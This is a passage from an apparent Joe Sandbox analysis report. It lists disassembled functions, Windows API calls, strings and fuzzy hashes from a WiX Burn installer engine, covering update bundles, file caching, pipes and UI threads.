StringFromGUID2.OLE32(?,?,00000027), ref: 009AFA4B
LeaveCriticalSection.KERNEL32(?,?), ref: 009AFAF4

Strings

Failed to convert bundle update guid into string., xrefs: 009AFA6A
update\%ls, xrefs: 009AF9A3
EngineForApplication.cpp, xrefs: 009AFA60
Failed to create bundle update guid., xrefs: 009AFA37
Failed to recreate command-line for update bundle., xrefs: 009AFA12
Failed to set update bundle., xrefs: 009AFACE
Failed to default local update source, xrefs: 009AF9B7

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: CriticalSection$CreateEnterFromLeaveStringUuid
String ID: EngineForApplication.cpp$Failed to convert bundle update guid into string.$Failed to create bundle update guid.$Failed to default local update source$Failed to recreate command-line for update bundle.$Failed to set update bundle.$update\%ls
API String ID: 171215650-2594647487
Opcode ID: ed4f7290c99682ab3389b9c5239263c75dc479f277e556723085b84d553b64ea
Instruction ID: 7498f9c39c55e179503592b63e0a6ce7da9fe36f32ebaa879071af85e35f025c
Opcode Fuzzy Hash: ed4f7290c99682ab3389b9c5239263c75dc479f277e556723085b84d553b64ea
Instruction Fuzzy Hash: 4D618C31940219ABCF228FE5C855FAEBBB8EF89714F15417AF808AB251E7719C40DB90

Function 00994AE5 Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 144windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(?), ref: 00994C64
PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00994C75

Strings

Failed to open log., xrefs: 00994B18
Failed to create the message window., xrefs: 00994B98
Failed to check global conditions, xrefs: 00994B49
Failed to set registration variables., xrefs: 00994BDE
Failed to set action variables., xrefs: 00994BC4
WixBundleLayoutDirectory, xrefs: 00994BF5
Failed to query registration., xrefs: 00994BAE
Failed to set layout directory variable to value provided from command-line., xrefs: 00994C06
Failed while running , xrefs: 00994C2A

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: MessagePostWindow
String ID: Failed to check global conditions$Failed to create the message window.$Failed to open log.$Failed to query registration.$Failed to set action variables.$Failed to set layout directory variable to value provided from command-line.$Failed to set registration variables.$Failed while running $WixBundleLayoutDirectory
API String ID: 3618638489-3051724725
Opcode ID: f78829e09cf1479449fa1e20aad919d2188d0250e262a00b7b517bac641de77e
Instruction ID: 540d0eb9f2624b42223f3e65e3add867b780269f09075256cd17dbd81c44eca5
Opcode Fuzzy Hash: f78829e09cf1479449fa1e20aad919d2188d0250e262a00b7b517bac641de77e
Instruction Fuzzy Hash: DD41F37164261AFFCF275A68CC46FEAB66CFF41754F018616F844A6240EB60EC1297D0

Function 009AF051 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 125COMMON

Download Yara Rule

APIs

Part of subcall function 0099394F: GetProcessHeap.KERNEL32(?,000001C7,?,00992274,000001C7,00000001,80004005,8007139F,?,?,009D0267,8007139F,?,00000000,00000000,8007139F), ref: 00993960
Part of subcall function 0099394F: RtlAllocateHeap.NTDLL(00000000,?,00992274,000001C7,00000001,80004005,8007139F,?,?,009D0267,8007139F,?,00000000,00000000,8007139F), ref: 00993967

EnterCriticalSection.KERNEL32(?,00000014,00000001), ref: 009AF06E
LeaveCriticalSection.KERNEL32(?), ref: 009AF19B

Strings

Engine is active, cannot change engine state., xrefs: 009AF089
EngineForApplication.cpp, xrefs: 009AF17C
Failed to copy the arguments., xrefs: 009AF12D
UX requested unknown approved exe with id: %ls, xrefs: 009AF0CE
Failed to post launch approved exe message., xrefs: 009AF186
Failed to copy the id., xrefs: 009AF100

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: CriticalHeapSection$AllocateEnterLeaveProcess
String ID: Engine is active, cannot change engine state.$EngineForApplication.cpp$Failed to copy the arguments.$Failed to copy the id.$Failed to post launch approved exe message.$UX requested unknown approved exe with id: %ls
API String ID: 1367039788-528931743
Opcode ID: a1327e89a0398146f504ebd6d07b84ac5ded754604cacdb2991e37386d4e6e54
Instruction ID: 7fd9314e37dd82c27be2c323a279593e6740d26a0db1776a713f5e89c2378ff6
Opcode Fuzzy Hash: a1327e89a0398146f504ebd6d07b84ac5ded754604cacdb2991e37386d4e6e54
Instruction Fuzzy Hash: 6431E232A49225EFCF219FA8DC55F6A77A8EF45720B028525FD04EB251EB30ED0087E0

Function 009A969D Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 102fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000005,00000000,00000003,08000000,00000000,00000000,00000000,?,009AA7D4,00000000,00000000,00000000,?,00000000), ref: 009A96B8
GetLastError.KERNEL32(?,009AA7D4,00000000,00000000,00000000,?,00000000,?,00000000,00000000,00000000), ref: 009A96C6

Part of subcall function 009D4102: Sleep.KERNEL32(?,00000000,?,009A85EE,?,?,00000001,00000003,000007D0,?,?,?,?,?,?,00994DBC), ref: 009D4119

CloseHandle.KERNEL32(00000000,00000000,00000001,00000003,000007D0,?,00000000,00000000,00000000), ref: 009A97A4

Strings

Failed to copy %ls to %ls, xrefs: 009A9792
Failed to open container in working path: %ls, xrefs: 009A96F5
%ls container from working path '%ls' to path '%ls', xrefs: 009A974F
Copying, xrefs: 009A9743, 009A974E
Failed to move %ls to %ls, xrefs: 009A977C
Moving, xrefs: 009A973A
cache.cpp, xrefs: 009A96EA
Failed to verify container hash: %ls, xrefs: 009A9727

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: CloseCreateErrorFileHandleLastSleep
String ID: %ls container from working path '%ls' to path '%ls'$Copying$Failed to copy %ls to %ls$Failed to move %ls to %ls$Failed to open container in working path: %ls$Failed to verify container hash: %ls$Moving$cache.cpp
API String ID: 1275171361-1187406825
Opcode ID: fb6d7eef4c5f1b436514301820897ceceb03ab216c899b8a4a4095fdb261095c
Instruction ID: efca9490b6a374282ec8d1db3feb13b2f486d94b40f7ad418629b5402b8c319b
Opcode Fuzzy Hash: fb6d7eef4c5f1b436514301820897ceceb03ab216c899b8a4a4095fdb261095c
Instruction Fuzzy Hash: BD212332A81264BBDA321A5A9C46F6B765CEFC2B64F114115FE24BF3C0D6619D0086F2

Function 00996F85 Relevance: 18.2, APIs: 2, Strings: 10, Instructions: 227COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 00996FB2
LeaveCriticalSection.KERNEL32(?), ref: 009971BE

Strings

Failed to read variable count., xrefs: 00996FD2
Failed to read variable value as string., xrefs: 0099718B
Failed to read variable literal flag., xrefs: 00997199
Failed to read variable included flag., xrefs: 009971AE
Unsupported variable type., xrefs: 00997184
Failed to set variable value., xrefs: 00997171
Failed to read variable name., xrefs: 009971A7
Failed to set variable., xrefs: 00997192
Failed to read variable value type., xrefs: 009971A0
Failed to read variable value as number., xrefs: 00997178

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: Failed to read variable count.$Failed to read variable included flag.$Failed to read variable literal flag.$Failed to read variable name.$Failed to read variable value as number.$Failed to read variable value as string.$Failed to read variable value type.$Failed to set variable value.$Failed to set variable.$Unsupported variable type.
API String ID: 3168844106-528957463
Opcode ID: 1cee04b391d5b8b017fb489edf4da6388ee04208ff86f4c0545f2e92e96f3e93
Instruction ID: 871b41ddb94e38c3371afaa2f2425e53ca7e44bb04e0d95cb5a0c6b7b462ecef
Opcode Fuzzy Hash: 1cee04b391d5b8b017fb489edf4da6388ee04208ff86f4c0545f2e92e96f3e93
Instruction Fuzzy Hash: E7717071C1921EBFDF21DAE8CD45FAEBBB9EB84714F104526F900A6250DB349E509BA0

Function 009D44D1 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 255fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000005,00000000,00000003,08000080,00000000,?,?,00000000,?,00000000,?,?,?), ref: 009D4550
GetLastError.KERNEL32 ref: 009D4566
GetFileSizeEx.KERNEL32(00000000,?), ref: 009D45BF
GetLastError.KERNEL32 ref: 009D45C9
SetFilePointer.KERNEL32(00000000,?,?,00000001), ref: 009D461D
GetLastError.KERNEL32 ref: 009D4628
ReadFile.KERNEL32(?,?,?,?,00000000,?,00000000,?,?,00000001), ref: 009D4717
CloseHandle.KERNEL32(?), ref: 009D478A

Strings

fileutil.cpp, xrefs: 009D44F1, 009D45A8, 009D45E9, 009D476D

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: File$ErrorLast$CloseCreateHandlePointerReadSize
String ID: fileutil.cpp
API String ID: 3286166115-2967768451
Opcode ID: 4220808c34a38422cd296caec10881b6386442a380dd93c340e40f685b72d586
Instruction ID: ef980b29ec531b0798af5c59f9e52a57b3d46f42d8cef5354edc3cd249be5fa3
Opcode Fuzzy Hash: 4220808c34a38422cd296caec10881b6386442a380dd93c340e40f685b72d586
Instruction Fuzzy Hash: 33810536AC0226EBDF218E599C45B7E76ACAB41760F11C12BFD56EB380E774CD409AD0

Function 00993076 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 210COMMON

Download Yara Rule

APIs

ExpandEnvironmentStringsW.KERNEL32(00000040,00000000,00000040,00000000,00000040,00000000,00000000), ref: 009930C1
GetLastError.KERNEL32 ref: 009930C7
ExpandEnvironmentStringsW.KERNEL32(00000040,00000000,00000040,00000000,00000000), ref: 00993121
GetLastError.KERNEL32 ref: 00993127
GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 009931DB
GetLastError.KERNEL32 ref: 009931E5
GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 0099323B
GetLastError.KERNEL32 ref: 00993245

Strings

pathutil.cpp, xrefs: 009930EB
@, xrefs: 0099309B

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorLast$EnvironmentExpandFullNamePathStrings
String ID: @$pathutil.cpp
API String ID: 1547313835-3022285739
Opcode ID: a81b8973a7aec579b28a78a680d46128ff3882007bd9ebd6c120ef0e24d54084
Instruction ID: ab5b88397b8ec1708cc3c9f58a0b77ac839dc064321b19733c974a38fd87e885
Opcode Fuzzy Hash: a81b8973a7aec579b28a78a680d46128ff3882007bd9ebd6c120ef0e24d54084
Instruction Fuzzy Hash: F861A377D4522AABDF319FD88844B9EBBB8AB04750F168165EE10BB250E735DF0097D0

Function 00992DBF Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 203sleepfiletimeCOMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?,00000000,00000000,00000000), ref: 00992E5F
GetLastError.KERNEL32 ref: 00992E69
GetLocalTime.KERNEL32(?,?,?,?,?,?), ref: 00992F09
CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000001,00000080,00000000), ref: 00992F96
GetLastError.KERNEL32 ref: 00992FA3
Sleep.KERNEL32(00000064), ref: 00992FB7
CloseHandle.KERNEL32(?), ref: 0099301F

Strings

4Wu, xrefs: 00992E5F
pathutil.cpp, xrefs: 00992E8D
%ls_%04u%02u%02u%02u%02u%02u%ls%ls%ls, xrefs: 00992F66

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorLast$CloseCreateFileHandleLocalPathSleepTempTime
String ID: 4Wu$%ls_%04u%02u%02u%02u%02u%02u%ls%ls%ls$pathutil.cpp
API String ID: 3480017824-3300617194
Opcode ID: 83b3961930be0faa0cf0106d422e0e08ad995ca82cfa4a4c0ebb8e378dd292a9
Instruction ID: 262d2e4c554b818b3b0c4baa90aee186d343e3bfd0811dab2edc17fe514cf820
Opcode Fuzzy Hash: 83b3961930be0faa0cf0106d422e0e08ad995ca82cfa4a4c0ebb8e378dd292a9
Instruction Fuzzy Hash: B5714572D41229BBDF319F99DC89BAEB7B8AB08710F114195F914E7290D7349E80DF50

Function 009D6D50 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 165COMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,label,000000FF,?,?,?,7556DFD0,?,009D72C8,?,?), ref: 009D6DA6
SysFreeString.OLEAUT32(00000000), ref: 009D6E11
SysFreeString.OLEAUT32(00000000), ref: 009D6E89
SysFreeString.OLEAUT32(00000000), ref: 009D6EC8

Strings

term, xrefs: 009D6DD9
scheme, xrefs: 009D6DB9
`5w, xrefs: 009D6E11, 009D6E89, 009D6EC8
label, xrefs: 009D6D98

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: String$Free$Compare
String ID: `5w$label$scheme$term
API String ID: 1324494773-2081507386
Opcode ID: 0f026579ff634fdc97c32b8743278085b2f41f6dd1e234755f1d4f0a8b6d2547
Instruction ID: cff39d14d9f4bcca0975684b812d5e8ddbb5ca3c6b1f3a4333c3387bd78547bc
Opcode Fuzzy Hash: 0f026579ff634fdc97c32b8743278085b2f41f6dd1e234755f1d4f0a8b6d2547
Instruction Fuzzy Hash: C4518035941219FBCF15CB98CC44FAEBBB9EF04711F21829AE511A73A0DB309E50DB60

Function 009A4D8D Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 122COMMON

Download Yara Rule

APIs

UuidCreate.RPCRT4(?), ref: 009A4DC0
StringFromGUID2.OLE32(?,?,00000027), ref: 009A4DEF
UuidCreate.RPCRT4(?), ref: 009A4E3A
StringFromGUID2.OLE32(?,?,00000027), ref: 009A4E66

Strings

pipe.cpp, xrefs: 009A4E00, 009A4E4D
Failed to allocate pipe name., xrefs: 009A4E2F
BurnPipe.%s, xrefs: 009A4E1B
Failed to allocate pipe secret., xrefs: 009A4E8F
Failed to convert pipe guid into string., xrefs: 009A4E0C
Failed to create pipe guid., xrefs: 009A4DCD

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: CreateFromStringUuid
String ID: BurnPipe.%s$Failed to allocate pipe name.$Failed to allocate pipe secret.$Failed to convert pipe guid into string.$Failed to create pipe guid.$pipe.cpp
API String ID: 4041566446-2510341293
Opcode ID: b50866d4e68f10e87ed2bfc132d726bfe20fda7696d418835889de86db32f661
Instruction ID: 1f0420d541914ee0d30b10583fe23cb0c2541fe672807b09fe0cc63d1e97a71e
Opcode Fuzzy Hash: b50866d4e68f10e87ed2bfc132d726bfe20fda7696d418835889de86db32f661
Instruction Fuzzy Hash: 58418B72D45308ABDF21DBE6CD05FEEB7F8AB85710F204526E905AB280D6B49D45CB90

Function 009AEA7D Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 101threadCOMMON

Download Yara Rule

APIs

CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,00000000,?,?,0099548E,?,?), ref: 009AEA9D
GetLastError.KERNEL32(?,0099548E,?,?), ref: 009AEAAA
CreateThread.KERNEL32(00000000,00000000,009AE7B4,?,00000000,00000000), ref: 009AEB03
GetLastError.KERNEL32(?,0099548E,?,?), ref: 009AEB10
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,0099548E,?,?), ref: 009AEB4B
CloseHandle.KERNEL32(00000000,?,0099548E,?,?), ref: 009AEB6A
CloseHandle.KERNEL32(?,?,0099548E,?,?), ref: 009AEB77

Strings

Failed to create the UI thread., xrefs: 009AEB3B
uithread.cpp, xrefs: 009AEACB, 009AEB31
Failed to create initialization event., xrefs: 009AEAD5

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: CloseCreateErrorHandleLast$EventMultipleObjectsThreadWait
String ID: Failed to create initialization event.$Failed to create the UI thread.$uithread.cpp
API String ID: 2351989216-3599963359
Opcode ID: 9c91d76573e3fc5f3c06a180113c905c67f64f1ccc50dae2879ce0f338721fa7
Instruction ID: 01287abcd0ba02ec4fb70c76b217f83b8cf7079c38e422a3ec15e39c909402ef
Opcode Fuzzy Hash: 9c91d76573e3fc5f3c06a180113c905c67f64f1ccc50dae2879ce0f338721fa7
Instruction Fuzzy Hash: FC31B276D41229BBDB11DFDA8C85A9EBBACFF05750F11006ABA05F7240E2309E0086E0

Function 009AE645 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 97threadCOMMON

Download Yara Rule

APIs

CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,00000000,00000000,?,?,0099548E,?,?), ref: 009AE666
GetLastError.KERNEL32(?,?,0099548E,?,?), ref: 009AE673
CreateThread.KERNEL32(00000000,00000000,009AE3C8,00000000,00000000,00000000), ref: 009AE6D2
GetLastError.KERNEL32(?,?,0099548E,?,?), ref: 009AE6DF
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,0099548E,?,?), ref: 009AE71A
CloseHandle.KERNEL32(?,?,?,0099548E,?,?), ref: 009AE72E
CloseHandle.KERNEL32(?,?,?,0099548E,?,?), ref: 009AE73B

Strings

Failed to create modal event., xrefs: 009AE69E
Failed to create UI thread., xrefs: 009AE70A
splashscreen.cpp, xrefs: 009AE694, 009AE700

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: CloseCreateErrorHandleLast$EventMultipleObjectsThreadWait
String ID: Failed to create UI thread.$Failed to create modal event.$splashscreen.cpp
API String ID: 2351989216-1977201954
Opcode ID: 88dacfa6d06cf8794b42c438113d3ea29252f3bd6aeb55519b4261600b9bd820
Instruction ID: 12a3a73a610dc9c75b62be4819a64f55f44e35677a744135c3a899a980d79de0
Opcode Fuzzy Hash: 88dacfa6d06cf8794b42c438113d3ea29252f3bd6aeb55519b4261600b9bd820
Instruction Fuzzy Hash: 84318476D41229BBDB119B99CC05AAFBBB8AB95710F11456AFD10F7240E7705E00CAE0

Function 009B14E1 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 91threadCOMMON

Download Yara Rule

APIs

WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,75572F60,?,?,00995405,009953BD,00000000,00995445), ref: 009B1506
GetLastError.KERNEL32 ref: 009B1519
GetExitCodeThread.KERNEL32(009DB488,?), ref: 009B155B
GetLastError.KERNEL32 ref: 009B1569
ResetEvent.KERNEL32(009DB460), ref: 009B15A4
GetLastError.KERNEL32 ref: 009B15AE

Strings

cabextract.cpp, xrefs: 009B1540, 009B1590, 009B15D5
Failed to get extraction thread exit code., xrefs: 009B159A
Failed to wait for operation complete event., xrefs: 009B154A
Failed to reset operation complete event., xrefs: 009B15DF

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorLast$CodeEventExitMultipleObjectsResetThreadWait
String ID: Failed to get extraction thread exit code.$Failed to reset operation complete event.$Failed to wait for operation complete event.$cabextract.cpp
API String ID: 2979751695-3400260300
Opcode ID: 01d8067be464da1ad0ab710b6faf312de6dbb71627b9f74dff1ff312ae6b1c7a
Instruction ID: b96a8a2f339b677dd759f75bff64e5219bb950dbeee1a0e80c57fa9a77a150b9
Opcode Fuzzy Hash: 01d8067be464da1ad0ab710b6faf312de6dbb71627b9f74dff1ff312ae6b1c7a
Instruction Fuzzy Hash: 7631C871A41305EBDB209FAA8E11BEE77FCEB84720B50416BF916D6160E774DE00AB61

Function 009B15FE Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 82synchronizationCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(009DB478,?,00000000,?,0099C1D3,?,009953BD,00000000,?,009A784D,?,0099566D,00995479,00995479,00000000,?), ref: 009B161B
GetLastError.KERNEL32(?,0099C1D3,?,009953BD,00000000,?,009A784D,?,0099566D,00995479,00995479,00000000,?,00995489,FFF9E89D,00995489), ref: 009B1625
WaitForSingleObject.KERNEL32(009DB488,000000FF,?,0099C1D3,?,009953BD,00000000,?,009A784D,?,0099566D,00995479,00995479,00000000,?,00995489), ref: 009B165F
GetLastError.KERNEL32(?,0099C1D3,?,009953BD,00000000,?,009A784D,?,0099566D,00995479,00995479,00000000,?,00995489,FFF9E89D,00995489), ref: 009B1669
CloseHandle.KERNEL32(00000000,00995489,?,00000000,?,0099C1D3,?,009953BD,00000000,?,009A784D,?,0099566D,00995479,00995479,00000000), ref: 009B16B4
CloseHandle.KERNEL32(00000000,00995489,?,00000000,?,0099C1D3,?,009953BD,00000000,?,009A784D,?,0099566D,00995479,00995479,00000000), ref: 009B16C3
CloseHandle.KERNEL32(00000000,00995489,?,00000000,?,0099C1D3,?,009953BD,00000000,?,009A784D,?,0099566D,00995479,00995479,00000000), ref: 009B16D2

Strings

cabextract.cpp, xrefs: 009B1649, 009B168D
Failed to wait for thread to terminate., xrefs: 009B1697
Failed to set begin operation event., xrefs: 009B1653

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: CloseHandle$ErrorLast$EventObjectSingleWait
String ID: Failed to set begin operation event.$Failed to wait for thread to terminate.$cabextract.cpp
API String ID: 1206859064-226982402
Opcode ID: 4ce72787654557f26b1472fbb19874145ef7ee75d88ab6a079fd03d2e3ba6488
Instruction ID: eac677a4cf2253f9448daf9ca9f90f26c1168473a819fdb2fa0b4ef7e3b7d480
Opcode Fuzzy Hash: 4ce72787654557f26b1472fbb19874145ef7ee75d88ab6a079fd03d2e3ba6488
Instruction Fuzzy Hash: 90217B33551A22FBC7214B66CD09796B7A8FF08735F5A0226F904619A0D774EC50CAD8

Function 009A41EC Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 009D0523: EnterCriticalSection.KERNEL32(009FB5FC,00000000,?,?,?,009A4207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,009954FA,?), ref: 009D0533
